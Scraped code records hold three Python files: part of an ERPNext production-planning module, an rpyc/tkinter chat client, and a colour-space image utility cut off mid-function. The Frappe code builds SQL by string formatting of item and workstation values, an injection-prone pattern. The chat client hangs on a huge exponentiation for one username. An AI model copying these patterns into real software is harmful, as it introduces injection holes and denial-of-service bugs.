\"\"\n\tbom_item = \"bom.item = so_item.item_code\"\n\n\tdate_field_mapper = {\n\t\t'from_date': ('>=', 'so.transaction_date'),\n\t\t'to_date': ('<=', 'so.transaction_date'),\n\t\t'from_delivery_date': ('>=', 'so_item.delivery_date'),\n\t\t'to_delivery_date': ('<=', 'so_item.delivery_date')\n\t}\n\n\tfor field, value in date_field_mapper.items():\n\t\tif self.get(field):\n\t\t\tso_filter += f\" and {value[1]} {value[0]} %({field})s\"\n\n\tfor field in ['customer']:\n\t\tif self.get(field):\n\t\t\tso_field = field\n\t\t\tso_filter += f\" and so.{so_field} = %({field})s\"\n\n\tif self.item and frappe.db.exists('Item', self.item):\n\t\tbom_item = get_bom_item(self) or bom_item\n\t\titem_code = self.item\n\t\titem_filter += \" and so_item.item_code = '%s'\" % self.item\n\n\topen_so = frappe.db.sql(f\"\"\"\n\t\tselect distinct so.name, so.transaction_date, so.customer, date(so_item.delivery_date) as delivery_date,so_item.item_code,(so_item.qty-so_item.delivered_qty) as qty,so_item.name as sales_order_item\n\t\tfrom `tabSales Order` so, `tabSales Order Item` so_item\n\t\twhere so_item.parent = so.name\n\t\t\tand so.docstatus = 1 and so.status not in (\"Stopped\", \"Closed\") and ((so_item.qty-so_item.delivered_qty)>0) {so_filter} {item_filter}\n\t\t\tand (exists (select name from `tabBOM` bom where bom.item = so_item.item_code\n\t\t\t\t\tand bom.is_active = 1)\n\t\t\t\tor exists (select name from `tabPacked Item` pi\n\t\t\t\t\twhere pi.parent = so.name and pi.parent_item = so_item.item_code\n\t\t\t\t\t\tand exists (select name from `tabBOM` bom where bom.item=pi.item_code\n\t\t\t\t\t\t\tand bom.is_active = 1)))\n\t\t\"\"\", self.as_dict(), as_dict=1)\n\n\topen_sales_orders = [so.name for so in open_so]\n\t\n\topen_sales_orders = \"', '\".join(open_sales_orders)\n\n\tcheck_previous_planning = frappe.db.sql(\"\"\"SELECT sot.sales_order from `tabSales Order Table` sot join `tabProduction Planning With Lead Time` pp on pp.name = sot.parent where pp.docstatus in (0,1) and sot.sales_order in ('{0}') \"\"\".format(open_sales_orders),as_dict=1)\n\n\tcheck_previous_planning = [sot.sales_order for sot in check_previous_planning]\n\tfinal_so_list = []\n\tif check_previous_planning:\n\t\tfor row in open_so:\n\t\t\tif row.name in check_previous_planning:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tfinal_so_list.append(row)\n\t\treturn final_so_list\n\telse:\n\t\treturn open_so\ndef get_open_mr(self):\n\tmr_filter = item_filter = \"\"\n\tbom_item = \"bom.item = mr_item.item_code\"\n\n\tdate_field_mapper = {\n\t\t'from_date': ('>=', 'mr.transaction_date'),\n\t\t'to_date': ('<=', 'mr.transaction_date'),\n\t\t'from_delivery_date': ('>=', 'mr_item.schedule_date'),\n\t\t'to_delivery_date': ('<=', 'mr_item.schedule_date')\n\t}\n\n\tfor field, value in date_field_mapper.items():\n\t\tif self.get(field):\n\t\t\tmr_filter += f\" and {value[1]} {value[0]} %({field})s\"\n\n\t# for field in ['customer']:\n\t# \tif self.get(field):\n\t# \t\tso_field = field\n\t# \t\tso_filter += f\" and so.{so_field} = %({field})s\"\n\n\tif self.item and frappe.db.exists('Item', self.item):\n\t\tbom_item = get_bom_item(self) or bom_item\n\t\titem_filter += \" and mr_item.item_code = '%s'\" % self.item\n\n\topen_mr = frappe.db.sql(f\"\"\"\n\t\tselect distinct mr.name, mr.transaction_date,date(mr_item.schedule_date) as delivery_date,mr_item.item_code,(mr_item.qty-mr_item.ordered_qty) as qty ,mr_item.name as material_request_item\n\t\tfrom `tabMaterial Request` mr, `tabMaterial Request Item` mr_item\n\t\twhere mr_item.parent = mr.name\n\t\t\tand mr.docstatus = 1 and mr.status not in (\"Stopped\", \"Cancelled\") and mr.material_request_type = \"Manufacture\" and ((mr_item.qty-mr_item.ordered_qty)>0) {mr_filter} {item_filter}\n\t\t\tand (exists (select name from `tabBOM` bom where {bom_item}\n\t\t\t\t\tand bom.is_active = 1)\n\t\t\t\t)\n\t\t\"\"\", self.as_dict(), as_dict=1)\n\topen_material_request = [mr.name for mr in open_mr]\n\n\topen_material_request = \"', '\".join(open_material_request)\n\n\tcheck_previous_planning = frappe.db.sql(\"\"\"SELECT sot.material_request from `tabSales Order Table` sot join `tabProduction Planning With Lead Time` pp on pp.name = sot.parent where pp.docstatus in (0,1) and sot.material_request in ('{0}') \"\"\".format(open_material_request),as_dict=1)\n\n\tcheck_previous_planning = [sot.material_request for sot in check_previous_planning]\n\tfinal_mr_list = []\n\tif check_previous_planning:\n\t\tfor row in open_mr:\n\t\t\tif row.name in check_previous_planning:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tfinal_mr_list.append(row)\n\t\treturn final_mr_list\n\telse:\n\t\treturn open_mr\ndef get_bom_item(self):\n\t\"\"\"Check if Item or if its Template has a BOM.\"\"\"\n\tbom_item = None\n\thas_bom = frappe.db.exists({'doctype': 'BOM', 'item': self.item, 'docstatus': 1})\n\tif not has_bom:\n\t\ttemplate_item = frappe.db.get_value('Item', self.item, ['variant_of'])\n\t\tbom_item = \"bom.item = {0}\".format(frappe.db.escape(template_item)) if template_item else bom_item\n\treturn bom_item\n\ndef get_overlap_for(self, args, check_next_available_slot=False):\n\t\tproduction_capacity = 1\n\n\t\tif self.workstation:\n\t\t\tproduction_capacity = (\n\t\t\t\tfrappe.get_cached_value(\"Workstation\", self.workstation, \"production_capacity\") or 1\n\t\t\t)\n\t\t\tvalidate_overlap_for = \" and jc.workstation = %(workstation)s \"\n\n\t\tif args.get(\"employee\"):\n\t\t\t# override capacity for employee\n\t\t\tproduction_capacity = 1\n\t\t\tvalidate_overlap_for = \" and jctl.employee = %(employee)s \"\n\n\t\textra_cond = \"\"\n\t\tif check_next_available_slot:\n\t\t\textra_cond = \" or (%(from_time)s <= jctl.from_time and %(to_time)s <= jctl.to_time)\"\n\n\t\texisting = frappe.db.sql(\n\t\t\t\"\"\"select jc.name as name, jctl.to_time from\n\t\t\t`tabJob Card Time Log` jctl, `tabJob Card` jc where jctl.parent = jc.name and\n\t\t\t(\n\t\t\t\t(%(from_time)s > jctl.from_time and %(from_time)s < jctl.to_time) or\n\t\t\t\t(%(to_time)s > jctl.from_time and %(to_time)s < jctl.to_time) or\n\t\t\t\t(%(from_time)s <= jctl.from_time and %(to_time)s >= jctl.to_time) {0}\n\t\t\t)\n\t\t\tand jctl.name != %(name)s and jc.name != %(parent)s and jc.docstatus < 2 {1}\n\t\t\torder by jctl.to_time desc limit 1\"\"\".format(\n\t\t\t\textra_cond, validate_overlap_for\n\t\t\t),\n\t\t\t{\n\t\t\t\t\"from_time\": args.from_time,\n\t\t\t\t\"to_time\": args.to_time,\n\t\t\t\t\"name\": args.name or \"No Name\",\n\t\t\t\t\"parent\": args.parent or \"No Name\",\n\t\t\t\t\"employee\": args.get(\"employee\"),\n\t\t\t\t\"workstation\": self.workstation,\n\t\t\t},\n\t\t\tas_dict=True,\n\t\t)\n\n\t\tif existing and production_capacity > len(existing):\n\t\t\treturn\n\n\t\treturn existing[0] if existing else None\ndef check_workstation_availability(date_to_be_ready,bom,qty):\n\tbom_doc = frappe.get_doc(\"BOM\",bom)\n\tdate_dict = dict()\n\tif bom_doc.with_operations:\n\t\ttime_dict = dict()\n\t\tfor row in bom_doc.operations:\n\t\t\ttime_in_mins = flt(row.time_in_mins*qty)\n\t\t\ttime_in_days = (time_in_mins/480)\n\t\t\tif row.idx == 1:\n\t\t\t\t# first operation at planned_start date\n\t\t\t\tplanned_start_time = date_to_be_ready\n\t\t\t\ttime_dict.update({'planned_start_time':planned_start_time})\n\t\t\telse:\n\t\t\t\tplanned_start_time = (\n\t\t\t\t\tget_datetime(time_dict.get('planned_end_time')) \n\t\t\t\t)\n\t\t\t\t# + get_mins_between_operations()\n\t\t\tplanned_end_time = get_datetime(planned_start_time) + timedelta(time_in_days)\n\t\t\ttime_dict.update({'planned_end_time':planned_end_time})\n\t\t\tjc_data = frappe.db.sql(\"\"\"SELECT jc.name,jc.workstation,date(jc_time.from_time) as from_date from `tabJob Card` jc join `tabJob Card Time Log` jc_time on jc_time.parent = jc.name where jc.workstation = '{0}' and jc.status in ('Open','Work In Progress','Material Transferred','Submitted') and date(jc_time.from_time) between '{1}' and '{2}' and date(jc_time.to_time) between '{1}' and '{2}'\"\"\".format(row.workstation,planned_start_time,planned_end_time),as_dict=1)\n\t\t\tif jc_data == []:\n\t\t\t\tif date_dict.get('planned_start_date'):\n\t\t\t\t\tif date_dict.get('planned_start_date') < date_to_be_ready:\n\t\t\t\t\t\tdate_dict.update({'planned_start_date':date_to_be_ready,'remark':\"All Workstations are available on time\"})\n\t\t\t\telse:\n\t\t\t\t\tdate_dict.update({'planned_start_date':date_to_be_ready,'remark':\"All Workstations are available on time\"})\n\t\t\telse:\n\t\t\t\tjc_data = frappe.db.sql(\"\"\"SELECT jc.name,jc.workstation,date(jc_time.to_time) as to_time from `tabJob Card` jc join `tabJob Card Time Log` jc_time on jc_time.parent = jc.name where jc.workstation = '{0}' and jc.status in ('Open','Work In Progress','Material Transferred','Submitted') and date(jc_time.from_time) > '{1}' order by to_time desc\"\"\".format(row.workstation,planned_start_time),as_dict=1)\n\t\t\t\tplanned_end_time=get_datetime(jc_data[0].get('to_time'))\n\t\t\t\t# planned_end_time=get_datetime(jc_data[0].get('to_time')) + get_mins_between_operations()\n\t\t\t\tremark = \"Workstation {0} is not available for date {1} \".format(jc_data[0].get('workstation'),date_to_be_ready)\n\t\t\t\tdate_dict.update({'planned_start_date':planned_end_time.date(),'remark':remark})\n\t\treturn date_dict\n\n\ndef get_partial_qty(date_to_be_ready, item_code, fg_warehouse_list):\n\tpartial_qty_dict = dict()\n\tcurrent_stock = frappe.db.sql(\"\"\"SELECT item_code, sum(actual_qty) as qty from `tabBin` where warehouse in ({0}) and item_code='{1}' group by item_code \"\"\".format(fg_warehouse_list, item_code),as_dict=1)\n\n\t# update planned_data_dict\n\tif current_stock:\n\t\tfor row in current_stock:\n\t\t\tif row.get('item_code') in partial_qty_dict:\n\t\t\t\tqty = flt(partial_qty_dict.get(row.get('item_code'))) + row.get('qty')\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):qty})\n\t\t\telse:\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):row.get('qty')})\n\n\t# Get planned qty from purchase order\n\tplanned_po = frappe.db.sql(\"\"\"SELECT schedule_date, item_code, (qty-received_qty) as qty from `tabPurchase Order Item` where docstatus=1 and schedule_date >= '{0}' and schedule_date <= '{1}' and item_code='{2}' \"\"\".format(date.today(), date_to_be_ready, item_code), as_dict=1)\n\n\t# update partial_qty_dict\n\tif planned_po:\n\t\tfor row in planned_po:\n\t\t\tif row.get('item_code') in partial_qty_dict:\n\t\t\t\tqty = flt(partial_qty_dict.get(row.get('production_item'))) + row.get('qty')\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):qty})\n\t\t\t\tif partial_qty_dict.get(\"schedule_date\") and partial_qty_dict.get(\"schedule_date\") < row.get(\"schedule_date\"):\n\t\t\t\t\tpartial_qty_dict.update({\"schedule_date\":row.get(\"schedule_date\")})\n\t\t\t\telse:\n\t\t\t\t\tpartial_qty_dict.update({\"schedule_date\":row.get(\"schedule_date\")})\n\t\t\telse:\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):row.get('qty'), \"schedule_date\": row.get(\"schedule_date\")})\n\n\n\t#Get planned qty from material request for which Purchase Order not in place\n\tplanned_mr = frappe.db.sql(\"\"\"SELECT mri.schedule_date, mri.item_code, sum(mri.qty) as qty from `tabMaterial Request` mr join `tabMaterial Request Item` mri on mri.parent = mr.name where mr.schedule_date >= '{0}' and mr.schedule_date <= '{1}' and mri.item_code='{2}' and not exists(SELECT po.name from `tabPurchase Order` po join `tabPurchase Order Item` po_item on po_item.parent = po.name where po_item.material_request = mr.name)\"\"\".format(date.today(), date_to_be_ready, item_code),as_dict=1)\n\t# update partial_qty_dict\n\tif planned_mr:\n\t\tfor row in planned_mr:\n\t\t\tif row.get('item_code') in partial_qty_dict:\n\t\t\t\tqty = flt(partial_qty_dict.get(row.get('item_code'))) + row.get('qty')\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):qty})\n\t\t\t\tif partial_qty_dict.get(\"schedule_date\") and partial_qty_dict.get(\"schedule_date\") < row.get(\"schedule_date\"):\n\t\t\t\t\tpartial_qty_dict.update({\"schedule_date\":row.get(\"schedule_date\")})\n\t\t\t\telse:\n\t\t\t\t\tpartial_qty_dict.update({\"schedule_date\":row.get(\"schedule_date\")})\n\n\t\t\telse:\n\t\t\t\tpartial_qty_dict.update({row.get('item_code'):row.get('qty'), \"schedule_date\": row.get(\"schedule_date\")})\n\tif partial_qty_dict.get(\"schedule_date\"):\n\t\tschedule_date = get_datetime(partial_qty_dict.get(\"schedule_date\")) + timedelta(1)\n\t\tpartial_remark = \"{0} qty can be completed in planned/available inventory on date {1}.\\n\".format(partial_qty_dict.get(item_code), formatdate(schedule_date, \"mm-dd-yyyy\"))\n\t\tpartial_qty_dict.update({\"partial_remark\":partial_remark})\t\n\telif partial_qty_dict.get(item_code):\n\t\tpartial_remark = \"{0} qty can be completed in planned/available inventory on date {1}.\\n\".format(partial_qty_dict.get(item_code), formatdate(date.today(), \"mm-dd-yyyy\"))\n\t\tpartial_qty_dict.update({\"partial_remark\":partial_remark})\n\telse:\n\t\tpartial_qty_dict.update({\"partial_remark\":\"\"})\n\treturn partial_qty_dict\n\n\ndef check_partial_workstation_availability(date_to_be_ready,bom, qty):\n\tbom_doc = frappe.get_doc(\"BOM\",bom)\n\tworkstation_availability = dict()\n\tif bom_doc.with_operations:\n\t\ttime_dict = dict()\n\t\tfor row in bom_doc.operations:\n\t\t\tjc_data = frappe.db.sql(\"\"\"SELECT jc.name,jc.workstation,date(jc_time.from_time) as from_date, date(jc_time.to_time) as to_date from `tabJob Card` jc join `tabJob Card Time Log` jc_time on jc_time.parent = jc.name where jc.workstation = '{0}' and jc.status in ('Open','Work In Progress','Material Transferred','Submitted') and date(jc_time.from_time) >= '{1}' and date(jc_time.from_time) <= '{2}' and date(jc_time.to_time) >= '{1}' and date(jc_time.to_time) <= '{2}' order by jc_time.to_time desc \"\"\".format(row.workstation, date.today(), date_to_be_ready),as_dict=1)\n\t\t\tif jc_data == []:\n\t\t\t\tremark = \"All Workstation is available for date {0}.\".format(formatdate(date.today(), \"mm-dd-yyyy\"))\n\t\t\t\tworkstation_availability.update({'remark':remark})\n\t\t\telif jc_data[0].get('to_date') < date_to_be_ready:\n\t\t\t\tws_date = get_datetime(jc_data[0].get('to_date')) + timedelta(1)\n\t\t\t\tremark = \"Workstation {0} is available for date {1} \".format(jc_data[0].get('workstation'),formatdate(ws_date, \"mm-dd-yyyy\"))\n\t\t\t\tworkstation_availability.update({'remark':remark})\n\t\t\telse:\n\t\t\t\tworkstation_availability.update({'remark':\"\"})\n\t\treturn workstation_availability\n\ndef update_mr_status_in_raw_materials_table(self, mr_doc):\n\tdoc = frappe.get_doc(\"Material Request\", mr_doc)\n\tfor row in doc.items:\n\t\tfrappe.db.set_value(\"Raw Materials Table\", {'item':row.item_code}, \"mr_status\", doc.status)\n\t\tfrappe.db.commit()\n","repo_name":"indictranstech/rushabhinstruments_V13","sub_path":"instrument/instrument/doctype/production_planning_with_lead_time/production_planning_with_lead_time.py","file_name":"production_planning_with_lead_time.py","file_ext":"py","file_size_in_byte":55091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42235488920","text":"from tkinter import *\nfrom tkinter.ttk import *\nfrom exceptions import *\nimport tkinter.simpledialog\nfrom tkinter import ttk\nimport rpyc\nimport queue\nfrom queue import Queue\nfrom queue import Empty\n\n\n\n\nclass GUI2:\n\n port_entry = None\n ip_entry = None\n username_entry = None\n msg_entry = None\n chat_box = None\n online_box = None\n connected_label = None\n conn = None\n\n exposed_username = None\n\n def __init__(self, root):\n self.port_entry = StringVar(value=18812)\n self.ip_entry = StringVar(value='localhost')\n self.username_entry = StringVar(value='Bobi')\n self.connected_label = StringVar(value='...')\n self.to_who = StringVar(value='')\n self.msg_entry = StringVar()\n self.chat_box = None\n self.online_box = None\n\n self.root = root\n\n master = ttk.Frame(root)\n master.pack(padx=10, pady=10)\n\n\n left_panel = Frame(master)\n left_panel.pack(side=LEFT)\n\n right_panel = Frame(master)\n right_panel.pack(fill=BOTH, side=LEFT)\n\n Label(right_panel, text='Online').grid()\n self.online_box = Text(right_panel, width=10, height=5)\n self.online_box.grid(padx=5, pady=4)\n\n Label(right_panel, text=\"To who:\").grid()\n Entry(right_panel, textvariable=self.to_who).grid()\n\n tabs = ttk.Notebook(left_panel)\n\n chat_tab = Frame(tabs)\n chat_tab.pack()\n self.chat_box = Text(chat_tab, width=40, height=15)\n self.chat_box.grid()\n\n sending_box = Frame(chat_tab)\n\n self.msg_entry = Entry(sending_box)\n self.msg_entry.grid(row=0, column=0, sticky=EW)\n Button(sending_box, text='Send', command=self.send_msg).grid(row=0, column=1, sticky='we')\n\n sending_box.grid(sticky=NSEW)\n sending_box.grid_columnconfigure(0, weight=1)\n\n options_tab = Frame(tabs)\n\n login = Frame(options_tab)\n login.pack(expand=True, pady=30)\n Label(login, text='Ip').grid(row=0, column=0)\n Label(login, text='Port').grid(row=1, column=0)\n Label(login, text='Username').grid(row=3, column=0)\n Separator(login, orient=HORIZONTAL).grid(row=2, column=0, columnspan=2, sticky=EW, pady=5)\n Entry(login, textvariable=self.ip_entry).grid(row=0, column=1)\n Entry(login, textvariable=self.port_entry).grid(row=1, column=1)\n Entry(login, textvariable=self.username_entry).grid(row=3, column=1)\n Separator(login, orient=HORIZONTAL).grid(row=4, column=0, columnspan=2, sticky=EW, pady=5)\n Button(login, text='Connect', command=self.login).grid(row=5, column=0, columnspan=2)\n Label(login, text='Status:').grid(row=6, column=0, pady=30)\n\n Label(login, textvariable=self.connected_label).grid(row=6, column=1)\n\n tabs.add(chat_tab, text='Chat')\n tabs.add(options_tab, text='Options')\n\n tabs.pack(fill=BOTH, expand=Y)\n\n def login(self):\n ip = self.ip_entry.get()\n port = self.port_entry.get()\n self.exposed_username = self.username_entry.get()\n print('Adress', ip,':', port)\n\n self.c = rpyc.connect(str(ip), str(port))\n try:\n self.conn = self.c.root.connect(self.information)\n except Exception as ee:\n print(ee) # sorry\n self.connected_label.set('Failed!')\n else:\n self.connected_label.set('Connected!')\n self.bgsrv = rpyc.BgServingThread(self.c)\n self.do_list_users()\n\n def add_to_chat(self, text):\n self.chat_box.insert(END, '%s\\n' % text)\n\n # -------------------------- INTERACTION WITH SERVER --------------------------\n\n def send_msg(self):\n text = self.msg_entry.get()\n where = self.to_who.get()\n self.conn.can('msg', [where, text])\n\n def exposed_get_msg(self, msg_data):\n msg_data = dict(msg_data)\n x = 5245353\n if msg_data['who'] == 'Bobi':\n print(312312312**x)\n text = '[{who}]: {what}'.format(**msg_data)\n self.add_to_chat(text)\n\n def do_list_users(self):\n self.conn.can('list_users')\n self.root.after(3000, self.do_list_users)\n\n def exposed_get_list_users(self, users):\n text = ''\n for user in users:\n text += user + '\\n'\n self.online_box.delete(1.0, END)\n self.online_box.insert(END, text)\n\n # -----------------------END OF INTERACTION WITH SERVER --------------------------\n\n @property\n def information(self):\n info = {}\n info['username'] = self.exposed_username\n info['msg'] = self.exposed_get_msg\n info['private_msg'] = self.exposed_get_msg\n info['ping'] = self.exposed_get_msg\n info['list_users'] = self.exposed_get_list_users\n\n return info\nroot = Tk()\n\ngui = GUI2(root)\n\n\nroot.title(gui.exposed_username)\ngui.root.mainloop()\n\n\n\ngui.bgsrv.stop()\ngui.c.close()","repo_name":"Boberkraft/python","sub_path":"simple_chat/client/client_main_v2.py","file_name":"client_main_v2.py","file_ext":"py","file_size_in_byte":4887,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"23509277193","text":"import numpy as np\nfrom scipy.ndimage import gaussian_filter\n\n\n# Add 0 mean Gaussian noise\n# std: Standard deviation in normalized units\n# static: Set to True if same noise should be added to all frames\n# peak: Intensity of brightest pixel\ndef imnoise(clean, std, static=False, peak=None):\n dtype = clean.dtype\n\n if peak is None:\n peak = 1 if dtype.kind == 'f' else np.iinfo(dtype).max\n\n if static:\n # Constant noise for all frames\n h, w, c, N = clean.shape # axis=-1 is frame axis\n noise = np.repeat((np.random.randn(h, w, c, 1)*std), N, axis=-1)\n else:\n noise = np.random.randn(*clean.shape)*std\n noisy = clean.astype(np.float32)/peak + noise\n noisy = (noisy.clip(0, 1)*peak).astype(dtype)\n return noisy\n\n\n# Blur RGB image by applying 2d Gaussian kernel\ndef imgaussblur(clean, sigmas):\n if clean.ndim == 3: # Handle single input image\n clean = clean[...,np.newaxis]\n\n if np.isscalar(sigmas):\n sigmas = np.repeat(sigmas, clean.shape[-1])\n assert sigmas.shape[0] == clean.shape[-1]\n\n blur = np.zeros_like(clean)\n for ff, sigma in enumerate(sigmas): # for each frame\n for cc in range(3): # for each color\n blur[...,cc,ff] = gaussian_filter(clean[...,cc,ff], sigma,\n mode='nearest', truncate=2.0)\n\n return blur.squeeze()\n\n\n# Convert array of images to different datatypes\nuint16to8 = lambda imgs: (np.floor(im/256).astype(np.uint8) for im in imgs)\n# uint16toint16 = lambda imgs: (im.astype(np.int16) for im in imgs)\n# uint16tofp32 = lambda imgs: (im.astype(np.float32)/(2**16 - 1) for im in imgs)\n\n# Below are the functions for colour space transforms \n\ndef lin2pq( L ):\n \"\"\" Convert from absolute linear values (between 0.005 and 10000) to PQ-encoded values V (between 0 and 1)\n \"\"\"\n Lmax = 10000\n #Lmin = 0.005\n n = 0.15930175781250000\n m = 78.843750000000000\n c1 = 0.83593750000000000\n c2 = 18.851562500000000\n c3 = 18.687500000000000\n im_t = np.power(np.clip(L,0,Lmax)/Lmax,n)\n V = np.power((c2*im_t + c1) / (1+c3*im_t), m)\n return V\n\ndef pq2lin( V ):\n \"\"\" Convert from PQ-encoded values V (between 0 and 1) to absolute linear values (between 0.005 and 10000)\n \"\"\"\n Lmax = 10000\n n = 0.15930175781250000\n m = 78.843750000000000\n c1 = 0.83593750000000000\n c2 = 18.851562500000000\n c3 = 18.687500000000000\n\n im_t = np.power(np.maximum(V,0),1/m)\n L = Lmax * np.power(np.maximum(im_t-c1,0)/(c2-c3*im_t), 1/n) \n return L\n\ndef srgb2lin( p ):\n t = 0.04045\n a = 0.055\n p = p.clip(0,1)\n L = np.where( p<=t, p/12.92, ((p+a)/(1+a))**2.4 )\n return L\n\ndef lin2srgb( L ):\n t = 0.0031308\n a = 0.055\n L = L.clip(0,1)\n p = np.where( L<=t, L*12.92, (1+a)*(L)**(1/2.4) - a )\n return p\n\n__xyz2lms = np.array( [ [0.3592, 0.6976, -0.0358],\\\n [-0.1922, 1.1004, 0.0755], \\\n [0.0070, 0.0749, 0.8434] ] )\n\n__lms2ICtCp = np.array( [ [0.5000, 0.5000, 0.0000], \\\n [1.6137, -3.3234, 1.7097], \\\n [4.3780, -4.2455, -0.1325] ] )\n\n__ICtCp2lms = np.array( [ [1, 0.0086, 0.1110], \\\n [1, -0.0086, -0.1110], \\\n [1, 0.5600, -0.3206] ] )\n__lms2xyz = np.array( [ [2.0702, -1.3265, 0.2066], \\\n [0.3650, 0.6805, -0.0454], \\\n [-0.0496, -0.0494, 1.1880] ] )\n\ndef xyz2itp(xyz): \n itp = im_ctrans(lin2pq(im_ctrans(xyz,M=__xyz2lms)),M=__lms2ICtCp)\n return itp \n\ndef lms2itp(lms):\n itp = im_ctrans(lin2pq(lms),M=__lms2ICtCp)\n return itp \n\ndef itp2lms(itp):\n lms = pq2lin(im_ctrans(itp,M=__ICtCp2lms))\n return lms\n\n\ndef xyz2Yxy(col_vec):\n assert(col_vec.shape[1]==3)\n sum = np.sum(col_vec,axis=1)\n return np.stack( (col_vec[:,1], col_vec[:,0]/sum, col_vec[:,1]/sum), axis=1)\n\ndef Yxy2xyz(col_vec):\n assert(col_vec.shape[1]==3)\n return np.stack( (col_vec[:,0]*col_vec[:,1]/col_vec[:,2], \\\n col_vec[:,0], \\\n col_vec[:,0]/col_vec[:,2]*(1-col_vec[:,1]-col_vec[:,2])), axis=1)\n\ndef im2colvec(im):\n \"\"\" Convert an image ([height width 3] array) into a colour vector ([height*width 3] array)\n \"\"\"\n if im.ndim==2 and im.shape[1]==3: # Aleady a colour vector\n return im\n\n assert(im.shape[2]==3)\n npix = im.shape[0]*im.shape[1]\n return im.reshape( (npix, 3), order='F' ) \n\ndef colvec2im(colvec, shape):\n \"\"\" Convert a colour vector ([height*width 3] array) into an image ([height width 3] array) \n \"\"\"\n if colvec.ndim==3 and colvec.shape[2]==3: # Already an image\n return colvec\n\n assert(colvec.shape[1]==3)\n return col_vec.reshape( shape, order='F' )\n\n\n__rgb2020_2xyz = np.array( [ [0.6370, 0.1446, 0.1689], \\\n [0.2627, 0.6780, 0.0593], \\\n [0.0000, 0.0281, 1.0610] ] )\n\n\n__rgb709_2xyz = np.array( [ [0.4124, 0.3576, 0.1805], \\\n [0.2126, 0.7152, 0.0722], \\\n [0.0193, 0.1192, 0.9505] ] )\n\n__xyz2rgb2020 = np.array( [ [ 1.716502508360628, -0.355584689096764, -0.253375213570850], \\\n [-0.666625609145029, 1.616446566522207, 0.015775479726511], \\\n [0.017655211703087, -0.042810696059636, 0.942089263920533] ] )\n\n__xyz2rgb709 = np.array( [ [3.2406, -1.5372, -0.4986], \\\n [-0.9689, 1.8758, 0.0415], \\\n [0.0557, -0.2040, 1.0570] ] )\n\n# Get colour transform from \"fromCS\" to \"toSC\". CIE XYZ 1931 is used as an intermediate colour space\ndef get_cform( fromCS, toCS ):\n\n # Get the transform from 'fromCS' to XYZ\n if fromCS==\"rgb2020\":\n in2xyz = __rgb2020_2xyz\n elif fromCS==\"rgb709\":\n in2xyz = __rgb709_2xyz\n elif fromCS==\"xyz\":\n in2xyz = np.eye(3,3)\n else:\n assert( False ) # Not recognized colour space\n\n if toCS==\"rgb2020\":\n xyz2out = __xyz2rgb2020\n elif toCS==\"rgb709\":\n xyz2out = __xyz2rgb709\n elif toCS==\"lms\":\n xyz2out = __xyz2lms\n elif toCS==\"xyz\":\n xyz2out = np.eye(3,3)\n else:\n assert( False ) # Not recognized colour space\n\n return xyz2out @ in2xyz\n\n# Recipes for converting from a given colour space to CIE XYZ 1931\n# First value - non-linear conversion function (or None), second - colour conversion matrix \n__to_xyz_cforms = { \n \"rgb2020\" : (None, __rgb2020_2xyz),\n \"rgb709\" : (None, __rgb709_2xyz),\n \"xyz\" : (None, np.eye(3,3)),\n \"pq_rgb\" : (pq2lin, __rgb2020_2xyz),\n \"srgb\" : (srgb2lin, __rgb709_2xyz),\n \"Yxy\" : (Yxy2xyz, np.eye(3,3)),\n \"itp\" : (itp2lms, __lms2xyz)\n}\n\n# Recipes for converting from CIE XYZ 1931 to a given colour space \n# First value - colour transform matrix, second column - non-linear conversion function (or None)\n__from_xyz_cforms = { \n \"rgb2020\" : (__xyz2rgb2020, None),\n \"rgb709\" : (__xyz2rgb709, None),\n \"xyz\" : (np.eye(3,3), None),\n \"pq_rgb\" : (__xyz2rgb2020, lin2pq),\n \"srgb\" : (__xyz2rgb709, lin2srgb),\n \"Yxy\" : (np.eye(3,3), xyz2Yxy),\n \"itp\" : (__xyz2lms, lms2itp)\n}\n\ndef im_ctrans( im, fromCS=None, toCS=None, M=None, exposure=1 ):\n \"\"\"Transform an image or a colour vector from one colour space into another\n Parameters:\n in - either an image as (width, height, 3) array or (n, 3) colour vector\n fromCS, toCS - strings with the name of the input and output colour spaces. \n Linear colour spaces: rgb709, rgb2020, xyz, \n Non-linear colour spaces: pq_rgb (BT.2020), srgb (BT.709), Yxy\n M - if fromCS and toCS are not specified, you must pass the colour transformation matrix as M \n (default is None)\n exposure - The colour values are multiplied (in linear space) by the value of the `exposure`. \n Default is 1. This parameter is useful when converting between relative and absolute \n colour spaces, for example:\n\n im_ctrans(im, \"srgb\", \"pq_rgb\", exposure=100)\n\n will map peak white (1,1,1) in sRGB to (100,100,100) or 100 cd/m^2 D65 in BT.2020. \n\n Returns:\n An image or colour vector in the new colour space.\n \"\"\"\n\n col_vec = im2colvec(im)\n\n if fromCS:\n assert fromCS in __to_xyz_cforms, \"Unknown colour space\"\n nl_func, in2xyz = __to_xyz_cforms[fromCS] \n if nl_func:\n col_vec = nl_func(col_vec)\n \n if toCS:\n assert toCS in __from_xyz_cforms, \"Unknown colour space\"\n xyz2out, to_nl_func = __from_xyz_cforms[toCS]\n else:\n to_nl_func = None\n\n if M is None:\n M = xyz2out @ in2xyz\n\n col_vec_out = col_vec @ (M.transpose().astype(col_vec.dtype) * exposure)\n\n if to_nl_func: # Non-linearity, if needed\n col_vec_out = to_nl_func(col_vec_out)\n\n if im.ndim==3: # an image\n im_out = col_vec_out.reshape( im.shape, order='F' )\n else:\n im_out = col_vec_out\n\n return im_out\n\n\n# This looks like BT.601 to me, not 709: https://en.wikipedia.org/wiki/YCbCr \n\n_ycbcr2rgb_rec709 = np.array([[1, 0, 1.402],\n [1, -0.344136, -0.714136],\n [1, 1.772, 0]], dtype=np.float32) # This is rec 709 space\n \n_rgb_rec7092ycbcr = np.array([[0.298999944347618, 0.587000125991912, 0.113999929660470],\\\n [-0.168735860241319, -0.331264179453675, 0.500000039694994],\\\n [0.500000039694994, -0.418687679024188, -0.081312360670806]], dtype=np.float32)\n\n \n\ndef srgb2ycbcr(RGB):\n width = RGB.shape[1]\n height = RGB.shape[0]\n pix_count = width*height\n YUV = (np.reshape( RGB, (pix_count, 3), order='F' ) @ _rgb_rec7092ycbcr.transpose()).reshape( (height, 